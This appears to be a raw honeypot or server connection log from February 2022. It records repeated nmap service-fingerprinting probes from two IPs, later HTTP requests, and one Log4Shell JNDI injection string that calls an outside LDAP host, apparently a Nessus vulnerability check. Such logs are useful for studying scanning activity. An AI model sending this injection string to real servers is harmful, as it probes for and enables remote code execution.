2022-02-15T00:29:01Z	89.187.180.25	GET / HTTP/1.0
2022-02-15T00:29:06Z	89.187.180.25	OPTIONS / HTTP/1.0
2022-02-15T00:29:11Z	89.187.180.25	OPTIONS / RTSP/1.0
2022-02-15T00:29:21Z	89.187.180.25	€
2022-02-15T00:29:31Z	89.187.180.25	EHLO
2022-02-15T00:29:51Z	89.187.180.25	
2022-02-15T00:29:56Z	89.187.180.25	
2022-02-15T00:30:01Z	89.187.180.25	
2022-02-15T00:30:06Z	89.187.180.25	€ž


2022-02-15T00:30:22Z	89.187.180.25	l
2022-02-15T00:30:22Z	89.187.180.25	GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
2022-02-15T00:30:32Z	89.187.180.25	
default

2022-02-15T00:30:37Z	89.187.180.25	0„
2022-02-15T00:30:42Z	89.187.180.25	0

`

2022-02-15T00:30:42Z	89.187.180.25	OPTIONS sip:nm SIP/2.0
2022-02-15T00:30:42Z	89.187.180.25	Via: SIP/2.0/TCP nm;branch=foo
2022-02-15T00:30:42Z	89.187.180.25	From: <sip:nm@nm>;tag=root
2022-02-15T00:30:42Z	89.187.180.25	To: <sip:nm2@nm2>
2022-02-15T00:30:42Z	89.187.180.25	Call-ID: 50000
2022-02-15T00:30:42Z	89.187.180.25	CSeq: 42 OPTIONS
2022-02-15T00:30:42Z	89.187.180.25	Max-Forwards: 70
2022-02-15T00:30:42Z	89.187.180.25	Content-Length: 0
2022-02-15T00:30:42Z	89.187.180.25	Contact: <sip:nm@nm>
2022-02-15T00:30:42Z	89.187.180.25	Accept: application/sdp
2022-02-15T00:30:55Z	89.187.180.25	TNMP
2022-02-15T00:31:00Z	89.187.180.25	
2022-02-15T00:31:05Z	89.187.180.25	DmdT
2022-02-15T00:31:10Z	89.187.180.25	:
2022-02-15T00:31:15Z	89.187.180.25	DIST00000001ARGC00000005ARGV00000002ccARGV00000002-cARGV00000006nmap.cARGV00000002-oARGV00000006nmap.oDOTI00000000
2022-02-15T00:31:20Z	89.187.180.25	JRMI
2022-02-15T00:31:25Z	89.187.180.25	

2022-02-15T00:31:30Z	89.187.180.25	< NTP/1.2 >

2022-02-15T00:31:35Z	89.187.180.25	< NTP/1.1 >

2022-02-15T00:31:40Z	89.187.180.25	< NTP/1.0 >

2022-02-15T00:31:45Z	89.187.180.25	

2022-02-15T00:31:55Z	89.187.180.25	

2022-02-15T00:31:56Z	89.187.180.25	WWWOFFLE STATUS
2022-02-15T00:32:12Z	89.187.180.25	Subscribe

2022-02-15T00:32:17Z	89.187.180.25	Query

2022-02-15T00:32:22Z	89.187.180.25	
2022-02-15T00:32:27Z	89.187.180.25	

2022-02-15T00:32:27Z	89.187.180.25	GET /?CAVIT HTTP/1.1
2022-02-15T00:32:37Z	89.187.180.25	

2022-02-15T00:32:42Z	89.187.180.25	HELP


2022-02-15T00:32:42Z	89.187.180.25	stats
2022-02-15T00:32:52Z	89.187.180.25	666
2022-02-15T00:33:07Z	89.187.180.25	
Â
2022-02-15T00:33:12Z	89.187.180.25	Client string for PARC version 1 Wire Encryption version 1
2022-02-15T00:33:18Z	89.187.180.25	<
2022-02-15T00:33:23Z	89.187.180.25	4
2022-02-15T00:33:23Z	89.187.180.25	%-12345X@PJL INFO ID
2022-02-15T00:33:23Z	89.187.180.25	%-12345X
2022-02-15T00:33:33Z	89.187.180.25	serverstatus
2022-02-15T00:33:43Z	89.187.180.25	Âåå垠פ¦ÐÕÝÜÈÖÝ×ÕÈÑÖƒ€ÈݤѡȤÒÕ×Ý£¤¡Ý¦×ݘå
2022-02-15T00:33:48Z	89.187.180.25	#ST

2022-02-15T00:34:03Z	89.187.180.25	TSH 
2022-02-15T00:34:03Z	89.187.180.25	GET /server-info HTTP/1.1
2022-02-15T00:34:03Z	89.187.180.25	Client-DPAP-Version: 1.1
2022-02-15T00:34:03Z	89.187.180.25	User-Agent: iPhoto/9.1.1  (Macintosh; N; PPC)
2022-02-15T00:34:18Z	89.187.180.25	gkrellm 0.0.0
2022-02-15T00:34:24Z	89.187.180.25	<?xml version="1.0" ?><methodCall><methodName>nmap.probe</methodName></methodCall>

2022-02-15T00:34:29Z	89.187.180.25	A
2022-02-15T00:34:29Z	89.187.180.25	*1
2022-02-15T00:34:29Z	89.187.180.25	$4
2022-02-15T00:34:29Z	89.187.180.25	info
2022-02-15T00:34:39Z	89.187.180.25	show info
2022-02-15T00:34:49Z	89.187.180.25	€
2022-02-15T00:34:59Z	89.187.180.25	vp3
2022-02-15T00:35:04Z	89.187.180.25	”
2022-02-15T00:35:04Z	89.187.180.25	GET /api HTTP/1.0
2022-02-15T00:35:09Z	89.187.180.25	GET /hazelcast/rest/cluster HTTP/1.0
2022-02-15T00:35:19Z	89.187.180.25	þ

2022-02-15T00:35:24Z	89.187.180.25	ver
2022-02-15T00:35:35Z	89.187.180.25	init
off all
on identity version
send
quit

2022-02-15T00:35:35Z	89.187.180.25	GET /version HTTP/1.1
2022-02-15T00:35:50Z	89.187.180.25	
2022-02-15T00:35:55Z	89.187.180.25	Ö×ÅÕ@@@@ÆÁÒÅ@@@@
2022-02-15T00:36:00Z	89.187.180.25	ÿûÿú
2022-02-15T00:36:05Z	89.187.180.25	GIOP

2022-02-15T00:36:15Z	89.187.180.25	


2022-02-15T00:36:20Z	89.187.180.25	Ì

2022-02-15T00:36:25Z	89.187.180.25	fox a 1 -1 fox hello
{
fox.version=s:1.0
id=i:1
};;

2022-02-15T00:36:30Z	89.187.180.25	
2022-02-15T00:36:35Z	89.187.180.25	0000000000000000000000000000000000000
2022-02-15T00:36:41Z	89.187.180.25	VERSION
2022-02-15T00:36:46Z	89.187.180.25	NXSH-5.6.7

2022-02-15T00:36:51Z	89.187.180.25	CONNECT01 v09

2022-02-15T00:36:56Z	89.187.180.25	LO_SERVER_CLIENT_PAIR
Nmap
0000


2022-02-15T00:36:56Z	89.187.180.25	GET SERVER INFO
2022-02-15T00:37:06Z	89.187.180.25	get_info

2022-02-15T00:37:11Z	89.187.180.25	TVNM1   
MNRD1   
SWVN1   
IPPV1   
2022-02-15T00:37:16Z	89.187.180.25	CNXN
2022-02-15T00:37:21Z	89.187.180.25	>version

2022-02-15T00:37:26Z	89.187.180.25	login

2022-02-15T00:37:31Z	89.187.180.25	`
2022-02-15T00:37:39Z	89.187.180.25	€
2022-02-15T00:44:51Z	37.120.232.131	GET / HTTP/1.0
2022-02-15T00:44:57Z	37.120.232.131	OPTIONS / HTTP/1.0
2022-02-15T00:45:02Z	37.120.232.131	OPTIONS / RTSP/1.0
2022-02-15T00:45:12Z	37.120.232.131	€
2022-02-15T00:45:23Z	37.120.232.131	EHLO
2022-02-15T00:45:44Z	37.120.232.131	
2022-02-15T00:45:49Z	37.120.232.131	
2022-02-15T00:45:55Z	37.120.232.131	
2022-02-15T00:46:00Z	37.120.232.131	€ž


2022-02-15T00:46:16Z	37.120.232.131	l
2022-02-15T00:46:16Z	37.120.232.131	GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
2022-02-15T00:46:27Z	37.120.232.131	
default

2022-02-15T00:46:32Z	37.120.232.131	0„
2022-02-15T00:46:37Z	37.120.232.131	0

`

2022-02-15T00:46:38Z	37.120.232.131	OPTIONS sip:nm SIP/2.0
2022-02-15T00:46:38Z	37.120.232.131	Via: SIP/2.0/TCP nm;branch=foo
2022-02-15T00:46:38Z	37.120.232.131	From: <sip:nm@nm>;tag=root
2022-02-15T00:46:38Z	37.120.232.131	To: <sip:nm2@nm2>
2022-02-15T00:46:38Z	37.120.232.131	Call-ID: 50000
2022-02-15T00:46:38Z	37.120.232.131	CSeq: 42 OPTIONS
2022-02-15T00:46:38Z	37.120.232.131	Max-Forwards: 70
2022-02-15T00:46:38Z	37.120.232.131	Content-Length: 0
2022-02-15T00:46:38Z	37.120.232.131	Contact: <sip:nm@nm>
2022-02-15T00:46:38Z	37.120.232.131	Accept: application/sdp
2022-02-15T00:46:51Z	37.120.232.131	TNMP
2022-02-15T00:46:56Z	37.120.232.131	
2022-02-15T00:47:01Z	37.120.232.131	DmdT
2022-02-15T00:47:07Z	37.120.232.131	:
2022-02-15T00:47:12Z	37.120.232.131	DIST00000001ARGC00000005ARGV00000002ccARGV00000002-cARGV00000006nmap.cARGV00000002-oARGV00000006nmap.oDOTI00000000
2022-02-15T00:47:18Z	37.120.232.131	JRMI
2022-02-15T00:47:23Z	37.120.232.131	

2022-02-15T00:47:28Z	37.120.232.131	< NTP/1.2 >

2022-02-15T00:47:34Z	37.120.232.131	< NTP/1.1 >

2022-02-15T00:47:39Z	37.120.232.131	< NTP/1.0 >

2022-02-15T00:47:44Z	37.120.232.131	

2022-02-15T00:47:55Z	37.120.232.131	

2022-02-15T00:47:56Z	37.120.232.131	WWWOFFLE STATUS
2022-02-15T00:48:12Z	37.120.232.131	Subscribe

2022-02-15T00:48:17Z	37.120.232.131	Query

2022-02-15T00:48:23Z	37.120.232.131	
2022-02-15T00:48:28Z	37.120.232.131	

2022-02-15T00:48:28Z	37.120.232.131	GET /?CAVIT HTTP/1.1
2022-02-15T00:48:39Z	37.120.232.131	

2022-02-15T00:48:44Z	37.120.232.131	HELP


2022-02-15T00:48:45Z	37.120.232.131	stats
2022-02-15T00:48:55Z	37.120.232.131	666
2022-02-15T00:49:11Z	37.120.232.131	
Â
2022-02-15T00:49:16Z	37.120.232.131	Client string for PARC version 1 Wire Encryption version 1
2022-02-15T00:49:22Z	37.120.232.131	<
2022-02-15T00:49:27Z	37.120.232.131	4
2022-02-15T00:49:28Z	37.120.232.131	%-12345X@PJL INFO ID
2022-02-15T00:49:28Z	37.120.232.131	%-12345X
2022-02-15T00:49:39Z	37.120.232.131	serverstatus
2022-02-15T00:49:49Z	37.120.232.131	Âåå垠פ¦ÐÕÝÜÈÖÝ×ÕÈÑÖƒ€ÈݤѡȤÒÕ×Ý£¤¡Ý¦×ݘå
2022-02-15T00:49:54Z	37.120.232.131	#ST

2022-02-15T00:50:10Z	37.120.232.131	TSH 
2022-02-15T00:50:10Z	37.120.232.131	GET /server-info HTTP/1.1
2022-02-15T00:50:10Z	37.120.232.131	Client-DPAP-Version: 1.1
2022-02-15T00:50:10Z	37.120.232.131	User-Agent: iPhoto/9.1.1  (Macintosh; N; PPC)
2022-02-15T00:50:26Z	37.120.232.131	gkrellm 0.0.0
2022-02-15T00:50:32Z	37.120.232.131	<?xml version="1.0" ?><methodCall><methodName>nmap.probe</methodName></methodCall>

2022-02-15T00:50:37Z	37.120.232.131	A
2022-02-15T00:50:37Z	37.120.232.131	*1
2022-02-15T00:50:37Z	37.120.232.131	$4
2022-02-15T00:50:37Z	37.120.232.131	info
2022-02-15T00:50:48Z	37.120.232.131	show info
2022-02-15T00:50:58Z	37.120.232.131	€
2022-02-15T00:51:09Z	37.120.232.131	vp3
2022-02-15T00:51:14Z	37.120.232.131	”
2022-02-15T00:51:15Z	37.120.232.131	GET /api HTTP/1.0
2022-02-15T00:51:20Z	37.120.232.131	GET /hazelcast/rest/cluster HTTP/1.0
2022-02-15T00:51:31Z	37.120.232.131	þ

2022-02-15T00:51:36Z	37.120.232.131	ver
2022-02-15T00:51:47Z	37.120.232.131	init
off all
on identity version
send
quit

2022-02-15T00:51:47Z	37.120.232.131	GET /version HTTP/1.1
2022-02-15T00:52:03Z	37.120.232.131	
2022-02-15T00:52:08Z	37.120.232.131	Ö×ÅÕ@@@@ÆÁÒÅ@@@@
2022-02-15T00:52:13Z	37.120.232.131	ÿûÿú
2022-02-15T00:52:19Z	37.120.232.131	GIOP

2022-02-15T00:52:30Z	37.120.232.131	


2022-02-15T00:52:35Z	37.120.232.131	Ì

2022-02-15T00:52:40Z	37.120.232.131	fox a 1 -1 fox hello
{
fox.version=s:1.0
id=i:1
};;

2022-02-15T00:52:46Z	37.120.232.131	
2022-02-15T00:52:51Z	37.120.232.131	0000000000000000000000000000000000000
2022-02-15T00:52:56Z	37.120.232.131	VERSION
2022-02-15T00:53:02Z	37.120.232.131	NXSH-5.6.7

2022-02-15T00:53:07Z	37.120.232.131	CONNECT01 v09

2022-02-15T00:53:13Z	37.120.232.131	LO_SERVER_CLIENT_PAIR
Nmap
0000


2022-02-15T00:53:13Z	37.120.232.131	GET SERVER INFO
2022-02-15T00:53:23Z	37.120.232.131	get_info

2022-02-15T00:53:29Z	37.120.232.131	TVNM1   
MNRD1   
SWVN1   
IPPV1   
2022-02-15T00:53:34Z	37.120.232.131	CNXN
2022-02-15T00:53:40Z	37.120.232.131	>version

2022-02-15T00:53:45Z	37.120.232.131	login

2022-02-15T00:53:50Z	37.120.232.131	`
2022-02-15T00:54:04Z	37.120.232.131	€
2022-02-15T13:25:22Z	0.0.0.0	${jndi:ldap://log4shell-generic-esFzp2oROgteissJBHCS${lower:ten}.w.nessus.org/nessus}
2022-02-15T13:26:25Z	0.0.0.0	

2022-02-15T13:26:33Z	0.0.0.0	
2022-02-15T13:26:33Z	0.0.0.0	

2022-02-15T13:26:41Z	0.0.0.0	

2022-02-15T13:26:49Z	0.0.0.0	

2022-02-15T13:26:59Z	0.0.0.0	

2022-02-15T13:27:14Z	0.0.0.0	
²

2022-02-15T13:27:29Z	0.0.0.0	
2022-02-15T13:27:34Z	0.0.0.0	€@

2022-02-15T13:27:36Z	172.21.224.161	GET / HTTP/1.0
2022-02-15T13:27:59Z	0.0.0.0	I
2022-02-15T13:28:21Z	0.0.0.0	


2022-02-15T13:30:08Z	0.0.0.0	

2022-02-15T13:30:35Z	172.21.224.161	GET / HTTP/1.1
2022-02-15T13:30:35Z	172.21.224.161	Host: calhabmap.org:5200
2022-02-15T13:30:35Z	172.21.224.161	Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
2022-02-15T13:30:35Z	172.21.224.161	Accept-Language: en
2022-02-15T13:30:35Z	172.21.224.161	Connection: Keep-Alive
2022-02-15T13:30:35Z	172.21.224.161	User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2022-02-15T13:30:35Z	172.21.224.161	Pragma: no-cache
2022-02-15T13:30:35Z	172.21.224.161	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
2022-02-15T13:30:46Z	0.0.0.0	

2022-02-15T13:30:58Z	0.0.0.0	
2022-02-15T13:31:07Z	172.21.224.161	GET / HTTP/1.1
2022-02-15T13:31:07Z	172.21.224.161	Connection: Close
2022-02-15T13:31:07Z	172.21.224.161	Host: calhabmap.org
2022-02-15T13:31:07Z	172.21.224.161	Pragma: no-cache
2022-02-15T13:31:07Z	172.21.224.161	User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
2022-02-15T13:31:07Z	172.21.224.161	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
2022-02-15T13:31:07Z	172.21.224.161	Accept-Language: en
2022-02-15T13:31:07Z	172.21.224.161	Accept-Charset: iso-8859-1,*,utf-8
2022-02-15T13:31:12Z	172.21.224.161	GET login?hsgid=00000000-0000-0000-0000-000000000000&hasFP=1 HTTP/1.1
2022-02-15T13:31:12Z	172.21.224.161	Host: calhabmap.org:5200
2022-02-15T13:31:12Z	172.21.224.161	Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
2022-02-15T13:31:12Z	172.21.224.161	Accept-Language: en
2022-02-15T13:31:12Z	172.21.224.161	Connection: Close
2022-02-15T13:31:12Z	172.21.224.161	Accept-Encoding: gzip
2022-02-15T13:31:12Z	172.21.224.161	Client-ATV-Sharing-Version: 1.2
2022-02-15T13:31:12Z	172.21.224.161	Client-DAAP-Version: 3.13
2022-02-15T13:31:12Z	172.21.224.161	Client-iTunes-Sharing-Version: 3.15
2022-02-15T13:31:12Z	172.21.224.161	Viewer-Only-Client: 1
2022-02-15T13:31:12Z	172.21.224.161	User-Agent: Remote/1021
2022-02-15T13:31:12Z	172.21.224.161	Pragma: no-cache
2022-02-15T13:31:12Z	172.21.224.161	Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*